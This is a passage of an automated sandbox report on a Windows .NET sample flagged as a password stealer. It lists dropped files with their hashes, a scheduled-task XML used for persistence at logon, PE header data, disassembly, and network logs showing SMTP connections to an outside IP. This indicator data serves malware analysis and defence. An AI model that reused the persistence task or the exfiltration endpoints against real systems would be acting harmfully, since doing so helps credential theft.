Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
MD5:	4DC84D28CF28EAE82806A5390E5721C8
SHA1:	66B6385EB104A782AD3737F2C302DEC0231ADEA2
SHA-256:	1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
SHA-512:	E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzuq32ob.u1b.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fv5xasf4.rpi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ga4hat10.ybz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5tjpzaf.s5s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nlawgkar.oii.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny3uspx2.xmw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhe4w4cg.g22.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqq2bpia.wp5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp9C71.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.097049290187453
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtFNxvn:cgergYrFdOFzOzN33ODOiDdKrsuTFTv
MD5:	BFAAB82E2AEDC6DB97894A2168E57B86
SHA1:	60F6EB20D6147FF9C17ED46E179DF6369FA78A27
SHA-256:	4104608D4B81BC1B11F4C6E54FB103D0DDAA86F302AE1184FC2F3F3BAE2D60A5
SHA-512:	133B6963A33ECFCE3ABDE4E1DEBFAFC99FF5CF1B8BF8230C4D190DED47C3FC7D5227E848E371F9501CE4EA540E0D21C22B8E70FC305C60987AA83D61D4CABEE7
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpADC6.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\lnYkIr.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.097049290187453
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtFNxvn:cgergYrFdOFzOzN33ODOiDdKrsuTFTv
MD5:	BFAAB82E2AEDC6DB97894A2168E57B86
SHA1:	60F6EB20D6147FF9C17ED46E179DF6369FA78A27
SHA-256:	4104608D4B81BC1B11F4C6E54FB103D0DDAA86F302AE1184FC2F3F3BAE2D60A5
SHA-512:	133B6963A33ECFCE3ABDE4E1DEBFAFC99FF5CF1B8BF8230C4D190DED47C3FC7D5227E848E371F9501CE4EA540E0D21C22B8E70FC305C60987AA83D61D4CABEE7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\lnYkIr.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	743424
Entropy (8bit):	7.7638612229070745
Encrypted:	false
SSDEEP:	12288:xB3ZyDQWn9D5M/ANhqLcAofNy+Vr1QP7/rJFaOG9MjuLeBaVkI6omZu:xB3Z4QU9JqqVxQZ4j9Mjy0aVCRZu
MD5:	2D291BAEDB79EE55DAA67417103F0905
SHA1:	810F2F9576976B3E68A610FBE2797B148C82766C
SHA-256:	0DF39B8C26A1B395B2389908F7DC4781AABBA0AA10F4642BAF46B8F1A9E2C426
SHA-512:	3E5883A3232E43797744D377712FE77B5CBC750D83F983C33A2FA190FA9347DE812D01153BA7E380E60F0E9CF853974D3906891A138B59D43822673B46370203
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.e..............0................. ........@.. ....................................@.....................................O.......T...........................L...T............................................ ............... ..H............text........ ...................... ..`.rsrc...T...........................@..@.reloc...............V..............@..B........................H........A...3..........du...............................................0..K........( ....(.....{......=...%.r...p.%.(!....%.rW..p.%.(!....%.r...p.("...o#..."..($..."..($...z.,..{....,..{....o......(%....0..S........s&...}.....s'...}.....s'...}.....((....{.....o)....{.....8..s...o+....{......ds,...o-....{....r...po.....{.... ......s,...o/....{.....o0....{....r...po#....{.....o1....{.... .....Es...o+....{....rl..po.....{.....K..s,...o/....{.....o0....{....r...po#....{..

C:\Users\user\AppData\Roaming\lnYkIr.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7638612229070745
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
File size:	743'424 bytes
MD5:	2d291baedb79ee55daa67417103f0905
SHA1:	810f2f9576976b3e68a610fbe2797b148c82766c
SHA256:	0df39b8c26a1b395b2389908f7dc4781aabba0aa10f4642baf46b8f1a9e2c426
SHA512:	3e5883a3232e43797744d377712fe77b5cbc750d83f983c33a2fa190fa9347de812d01153ba7e380e60f0e9cf853974d3906891a138b59d43822673b46370203
SSDEEP:	12288:xB3ZyDQWn9D5M/ANhqLcAofNy+Vr1QP7/rJFaOG9MjuLeBaVkI6omZu:xB3Z4QU9JqqVxQZ4j9Mjy0aVCRZu
TLSH:	ECF4560220284EBECFD10FFAD41F1D520161FD3A9463B56B79437A9866B32CEC1DA5AD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.e..............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	338d96b2b3924e2d

Static PE Info

General

Entrypoint:	0x4aa3da
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65CA36A7 [Mon Feb 12 15:17:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
inc esi
cmp byte ptr [ecx+35h], al
inc esp
xor eax, 34383535h
push edx
cmp byte ptr [esp+esi], dh
cmp byte ptr [esi+35h], al
inc edi
inc ebp
xor dh, byte ptr [00000034h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaa386	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0xcf54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa914c	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa83f8	0xa8400	4631faea4ec3b812206fead246190f8b	False	0.909496018294948	data	7.900652138585597	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0xcf54	0xd000	7fb574703e63cc9363917a7aac8e574b	False	0.06935471754807693	data	3.729136473170915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0xc	0x200	c31a4c67487e70f7fd0214418c12d7f4	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xac100	0xbff8	Device independent bitmap graphic, 128 x 186 x 32, image size 47616, resolution 2834 x 2834 px/m	0.04181588800260459
RT_GROUP_ICON	0xb8108	0x14	data	1.15
RT_VERSION	0xb812c	0x2e8	data	0.4435483870967742
RT_MANIFEST	0xb8424	0xb2b	XML 1.0 document, Unicode text, UTF-8 (with BOM) text	0.3704092339979014

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2024 20:39:11.523232937 CET	49728	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:39:11.639709949 CET	80	49728	208.95.112.1	192.168.2.5
Feb 12, 2024 20:39:11.640081882 CET	49728	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:39:11.646333933 CET	49728	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:39:11.763645887 CET	80	49728	208.95.112.1	192.168.2.5
Feb 12, 2024 20:39:11.811657906 CET	49728	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:39:12.634736061 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:12.785979986 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:12.786217928 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:15.293914080 CET	49732	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:39:15.411195040 CET	80	49732	208.95.112.1	192.168.2.5
Feb 12, 2024 20:39:15.411359072 CET	49732	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:39:15.411724091 CET	49732	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:39:15.501027107 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:15.501266003 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:15.529270887 CET	80	49732	208.95.112.1	192.168.2.5
Feb 12, 2024 20:39:15.608537912 CET	49732	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:39:15.652216911 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:15.652388096 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:15.652601957 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:15.803988934 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:15.812763929 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:15.964152098 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:15.964207888 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:15.964292049 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:15.964320898 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:15.964360952 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:15.964409113 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:16.115633965 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:16.172827005 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:16.317367077 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:16.324548960 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:16.350382090 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:16.468524933 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:16.468611956 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:16.501565933 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:16.502795935 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:16.656523943 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:16.656881094 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:16.814771891 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:16.815133095 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:16.969650030 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:16.970750093 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.146693945 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.147015095 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.300123930 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.300786018 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.300869942 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.300906897 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.300945044 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.453418016 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.453463078 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.582454920 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.626324892 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.626918077 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.717891932 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.778352022 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.778377056 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.778584957 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:17.929697990 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:17.934920073 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:18.088067055 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.088097095 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.088116884 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.088136911 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.088160992 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:18.088231087 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:18.239687920 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.241957903 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:18.394340038 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.421770096 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:18.573385000 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.573959112 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:18.727788925 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.728287935 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:18.885345936 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:18.885689020 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:19.038610935 CET	587	49735	208.91.198.143	192.168.2.5
